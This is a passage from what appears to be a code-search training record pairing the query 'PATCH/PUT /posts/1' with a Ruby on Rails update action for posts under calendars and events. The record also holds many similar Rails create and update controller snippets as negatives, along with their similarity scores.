"def create\n puts \"Trying to Create New Post\"\n # Creates new post with given content tied to given userid\n @post = Post.new(post_params) \n if @post.save\n puts \"Post successfully created\"\n response.status=(201)\n render json: {status: \"Success\", message: [\"Post created!\"]}\n else\n # Error handling\n puts \"Something went wrong while creating new Post\"\n puts(@Post.errors.full_messages)\n response.status=(422)\n render json: { status: \"Error\", message: [@post.errors.full_messages]}\n end\n end",
"def create\n @post = current_user.posts.new(post_params)\n respond_to do |format|\n if @post.save\n format.html { redirect_to list_of_posts_post_path(@post.user), notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def post(*args)\n execute(:post, *args)\n end",
"def create\n redirect_to posts_path and return unless Mist.authorized?(:create_post, self)\n coerce_date(params[:post], 'published_at')\n @post = Mist::Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, :notice => 'Post was successfully created.' }\n format.json { render :json => @post, :status => :created, :location => @post }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render action: 'show', status: :created, location: @post }\n else\n format.html { render action: 'new' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = current_user.posts.build(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to new_post_successful_posts_path, notice: 'Anúncio criado com sucesso.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def post(*args)\n prepare_request(:post, args)\n @@client.add(:post, @path, *args)\n end",
"def create\n redirect_to login_path unless session[:user_id]\n message = 'Post was successfully created.'\n @post = Post.new(post_params)\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: message }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n @post.user = User.find_by_auth_token!(cookies[:auth_token])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render action: 'show', status: :created, location: @post }\n else\n format.html { render action: 'new' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = current_user.posts.new(post_params)\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n if @post.save\n redirect_to find_redirect(@post.page)\n else\n render :new\n render json: @post.errors, status: :unprocessable_entity\n end\n end"
] |
[
"0.74463975",
"0.73221767",
"0.73072433",
"0.7123966",
"0.7015686",
"0.701327",
"0.69841874",
"0.6939327",
"0.69313824",
"0.69053805",
"0.68196476",
"0.6812792",
"0.6793222",
"0.6792862",
"0.6779654",
"0.6779654",
"0.67625546",
"0.67602354",
"0.67515427",
"0.6735786",
"0.66983837",
"0.6694823",
"0.6676922",
"0.6648634",
"0.6618174",
"0.6609208",
"0.6576672",
"0.6567517",
"0.6535031",
"0.65248317",
"0.6517826",
"0.6512526",
"0.6512526",
"0.65004253",
"0.64875203",
"0.6482612",
"0.64796066",
"0.6479418",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.6452396",
"0.6443543",
"0.64413923",
"0.6439579",
"0.6431225",
"0.6411242",
"0.64027417",
"0.6402409",
"0.63972473",
"0.63956606",
"0.6388207",
"0.6388207",
"0.6380103",
"0.63764375",
"0.6374259",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.6369631",
"0.6361449",
"0.6350474",
"0.6349784",
"0.6345706",
"0.6312865",
"0.63084143",
"0.630361",
"0.63009614",
"0.62957925",
"0.6295694",
"0.62955",
"0.6294854",
"0.62942207",
"0.628781",
"0.62877417",
"0.6283785",
"0.6282612",
"0.6263583"
] |
0.0
|
-1
|
PATCH/PUT /posts/1 PATCH/PUT /posts/1.json
|
def update
@calendar = Calendar.find(params[:calendar_id])
@event = Event.find(params[:event_id])
respond_to do |format|
if @post.update(post_params)
format.html { redirect_to [@calendar,@event,@post], notice: 'Post was successfully updated.' }
format.json { render :show, status: :ok, location: @event }
else
format.html { render :edit }
format.json { render json: @post.errors, status: :unprocessable_entity }
end
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update\n render json: Post.update(params[\"id\"], params[\"post\"])\n end",
"def update\n respond_with Post.update(params[:id], params[:posts])\n end",
"def update\n @post = Post.find(params[:id])\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.json { render :json => @post }\n else\n format.json { render :json => @post.errors, :status => :unprocessable_entity}\n end\n end\n #respond_with Post.update(params[:id], params[:post])\n end",
"def update\n respond_with post.update(params[:id], params[:post])\n end",
"def update\n respond_with Post.update(params[:id],post_params)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(post_params)\n format.json { head :no_content }\n format.xml { head :no_content }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n format.xml { render xml: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update({\n title: post_params[:title],\n content: post_params[:content],\n })\n render json: Post.all.as_json\n else\n render json: {errors: @post.errors.full_messages}, status: :unprocessable_entity\n end\n end",
"def update\n id = Post.find(params[:id])._id\n \n respond_to do |format|\n if ((@post.update_attributes(params[:post])) && (@post._id = id))\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def api_patch(path, data = {})\n api_request(:patch, path, :data => data)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n @post.update_attributes(params[:post])\n format.html { redirect_to posts_url, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n end \n end",
"def update\n respond_to do |format|\n if @api_v1_post.update(api_v1_post_params)\n format.html { redirect_to @api_v1_post, notice: 'Post was successfully updated.' }\n format.json { render :show, status: :ok, location: @api_v1_post }\n else\n format.html { render :edit }\n format.json { render json: @api_v1_post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to posts_path, notice: 'Post was successfully updated.' }\n format.json { render json: @post }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch!\n request! :patch\n end",
"def patch\n headers = {\"If-Match\" => @version}\n response = @context.request :patch, \"#{@path}/#{@id}\", @data.to_json, headers\n @version += 1\n response\n # 'X-HTTP-Method-Override' => 'PATCH'\n end",
"def update\n authenticated\n\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n if @post.update(post_params)\n head :no_content\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def update\n @api_post = Api::Post.find(params[:id])\n\n if @api_post.update(api_post_params)\n head :no_content\n else\n render json: @api_post.errors, status: :unprocessable_entity\n end\n end",
"def update\n if @post.update(post_params)\n render json: {\n data: @post\n }\n else\n render json: {\n errors: @post.errors\n }\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @api_v2_post = Post.find(params[:id])\n\n respond_to do |format|\n if @api_v2_post.update_attributes(params[:api_v2_post])\n format.html { redirect_to @api_v2_post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @api_v2_post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n authorize @post\n\n if @post.save\n render json: @post\n else\n render json: @post.errors.full_messages, status: :unprocessable_entity\n end\n end",
"def update\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, :notice => 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, :notice => 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t@post = post.find(params[:id])\n\t\t@post.update_attributes(post_params)\n\t\trespond_to do |format|\n\t\t\tformat.html {redirect_to post_path(@post)}\n\t\t\tformat.json {render json: @post}\n\t\tend\n\tend",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.json { render :show, status: :ok, location: @post }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\tif @post.update(post_params)\n\t\t\trender json: @post, status: :success\n\t\telse\n\t\t\trender json: @post.errors, status: :unprocessable_entity #422\n\t\tend\n\tend",
"def update\n @post = Post.find(params[:id])\n @title = \"EDIT\"\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, :notice => 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'slam updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update(post_params)\n head :no_content\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def update\n @post.update_attributes(params[:post])\n respond_with(@post)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: '' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update # PATCH\n raise NotImplementedError\n end",
"def update\n @user = User.find(params[:user_id])\n @post = @user.posts.find(params[:id])\n\n if @post.update(post_params)\n head :no_content\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def update\n title = params[:title]\n body = params[:body]\n\n @post.update!(title: title, body: body)\n\n if @post.save!\n json_response(@post)\n else\n json_response(@post.errors)\n end\n end",
"def update\r\n @post = Post.find(params[:id])\r\n\r\n respond_to do |format|\r\n if @post.update_attributes(params[:post])\r\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\r\n format.json { head :no_content }\r\n else\r\n format.html { render action: \"edit\" }\r\n format.json { render json: @post.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def update\n @user = current_user\n @post = @user.posts.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def test_update_post\n data = {\n title: \"Roll lemon\",\n content: \"Gingerbread bear claw muffin danish danish marzipan. Toffee lollipop wafer carrot cake dessert.\",\n description: \"Chocolate tootsie roll lemon drops. Chupa chups chocolate bar apple pie\",\n image: \"chocolate.png\",\n status: 1\n }\n expected = 200\n post_id = 1\n uri = URI.parse('http://localhost:3000/v1/posts/'+post_id.to_s)\n http = Net::HTTP.new(uri.host,uri.port)\n request = Net::HTTP::Put.new(uri.path)\n request.set_form_data(data)\n response = http.request(request)\n actual = JSON.parse(response.body)\n result = assert_equal(expected,actual['meta']['code'])\n puts this_method_name + \" - \" + result.to_s\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to :action => 'index', notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @patch = Patch.find(params[:id])\n\n respond_to do |format|\n if @patch.update_attributes(params[:patch])\n format.html { redirect_to @patch, notice: 'Patch was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @patch.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if (@post.update(params.permit(:title, :content)))\n render json: @post, status: :ok\n else\n render json: @post.errors, status: 422\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to post_path, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch(path, data)\n request 'PATCH', path, body: data.to_json\n end",
"def update\n #disable edit for now\n redirect_to posts_path\n return\n \n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to magazine_post_path(@post.short_url), notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\", layout: \"editor\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update(post_params)\n render action: \"show.json.jbuilder\"\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to post_path(@post), notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\t\n\t\tpost = @current_user.role == \"admin\" ? Post.find_by(id: params[:id]) : @current_user.posts.find_by(id: params[:id]) \n\t\tif post && post.update_attributes(post_params)\n\t\trender json: {success: true, auth_token: @current_user.authentication_token, post_id: post.id, post_desc: post.description}\n\t else\n\t render json: {success: false, message: \"not found or validation failed\"}, status: 422\n\t\tend \n\tend",
"def update\n post = Post.find_by(id: params[:id])\n # byebug\n\n post.assign_attributes(update_params)\n if post.valid?\n post.save\n render json: post, status: :created\n else\n render json: {errors: post.errors.full_messages}, status: 422\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find_by_slug(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n #@post = Post.find(params[:id])\n\n #respond_to do |format|\n # if @post.update_attributes(params[:post])\n # format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n # format.json { head :no_content }\n #else\n # format.html { render action: \"edit\" }\n # format.json { render json: @post.errors, status: :unprocessable_entity }\n #end\n #end\n end",
"def update\n respond_to do |format|\n if @patch.update(patch_params)\n format.html { redirect_to @patch, notice: 'Patch was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @patch.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update \n #this works largely the same, \n @post = Post.find(params[:id])\n @post.created_at = params[:created_at] if !!params[:created_at]\n if @post.update_attributes(params[:post])\n render \"show\", handlers: [:rabl]\n else\n render :json => @post.errors.full_messages, status: 422\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to \"/#{session[:username]}\", notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update?(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n delete_caches\n end",
"def patch options\n rest_request({ method: :patch }.merge(options))\n end",
"def patch options\n rest_request({ method: :patch }.merge(options))\n end",
"def update\n update_resource_response(@post, blog_post_params)\n end",
"def update\n \n @previous_content = @post[:content]\n respond_to do |format|\n if @post.update_attributes(params[:post])\n \t\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n \n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n verify_owner_or_admin(@post)\n \n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: \"Post was successfully updated.\" }\n format.json { render :show, status: :ok, location: @post }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @update = Update.find(params[:id])\n @post = @update.post\n\n respond_to do |format|\n if @update.update_attributes(params[:update])\n format.html { redirect_to @post, notice: 'Update was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @update.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update(post_params)\n render json: {status: 1, id: @post.id.to_s, notice: \"修改成功,标题是:#{@post.title.capitalize}\", errors: []}\n else\n render json: {status: -1, notice: \"修改失败\", errors: @post.errors.fall_message}\n end\n end",
"def update\n params[:post][:tag_ids] ||= []\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to [@post.user, @post], notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\r\n @post = Post.find(params[:id])\r\n @root_post = root_post_of(@post)\r\n\r\n respond_to do |format|\r\n if @post.update_attributes(params[:post])\r\n @root_post.touch(:updated_at)\r\n update_child_posts(@post)\r\n\r\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\r\n format.json { head :no_content }\r\n else\r\n format.html { render action: \"edit\" }\r\n format.json { render json: @post.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def update\n @post.short_body = post_params[:body].split('</p>')[0] + '</p>'\n @post.tags.delete_all\n set_tags\n\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update_attributes(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { render :show, status: :ok, location: @post }\n else\n format.html { render :edit }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n render_forbidden and return unless can_edit?\n @post = Post.friendly.find(params[:id])\n \n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n redirect_to root_path\n end\n end\n end",
